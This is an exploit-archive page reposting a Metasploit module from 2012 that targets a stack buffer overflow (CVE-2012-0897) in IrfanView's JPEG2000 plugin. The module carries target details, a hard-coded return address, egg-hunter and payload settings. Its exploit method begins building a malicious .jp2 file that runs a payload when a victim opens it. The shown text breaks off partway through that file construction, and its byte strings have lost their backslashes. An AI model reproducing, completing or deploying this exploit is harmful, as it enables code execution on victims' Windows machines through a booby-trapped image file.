Home / exploits Irfanview JPEG2000 4.3.2.0 jp2 Stack Buffer Overflow
Posted on 03 July 2012
## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::Egghunter def initialize(info = {}) super(update_info(info, 'Name' => 'Irfanview JPEG2000 <= v4.3.2.0 jp2 Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow vulnerability in version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has been tested on a specific version of irfanview (v4.3.2), although other versions may work also. The vulnerability is triggered via parsing an invalid qcd chunk structure and specifying a malformed qcd size and data. Payload delivery and vulnerability trigger can be executed in multiple ways. The user can double click the file, use the file dialog, open via the icon and drag/drop the file into Irfanview's window. An egg hunter is used for stability. }, 'License' => MSF_LICENSE, 'Author' => [ 'Parvez Anwar <parvez[at]greyhathacker.net>', # vulnerability discovery 'mr_me <steventhomasseeley[at]gmail.com>', # msf-fu 'juan vazquez' # more improvements ], 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-0897' ], [ 'OSVDB', '78333'], [ 'BID', '51426' ], [ 'URL', 'http://www.greyhathacker.net/?p=525' ], ], 'Platform' => [ 'win' ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f' }, 'Payload' => { 'Space' => 4000, 'DisableNops' => true, }, 'Targets' => [ # push esp; retn [i_view32.exe] # http://www.oldapps.com/irfanview.php?old_irfanview=7097 # http://irfanview.tuwien.ac.at/plugins/irfanview_plugins_432_setup.exe [ 'Irfanview 4.32 / Plugins 4.32 / Windows Universal', { 'Ret' => 0x004819d8 } ] ], 'DisclosureDate' => 'Jan 16 2012', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ true, 'The output file name.', 'msf.jp2']), ], self.class) end # encode our string like unicode except we are not using nulls def encode_bytes(raw_bytes) encoded_bytes = "" 0.step(raw_bytes.length-1, 2) { |i| encoded_bytes << raw_bytes[i+1] encoded_bytes << raw_bytes[i] } return encoded_bytes end def exploit jp2 = "" jp2 << "x00x00x00x0c" # jp2 << "x6ax50x20x20" # [jP ] <0x6a502020> magic 0xd0a870a,len 12 jp2 << "x0dx0ax87x0a" # jp2 << "x00x00x00x14" # jp2 << "x66x74x79x70" # jp2 << "x6ax70x32x20" # jp2 << "x00x00x00x00" # MinorVersion = 0 = [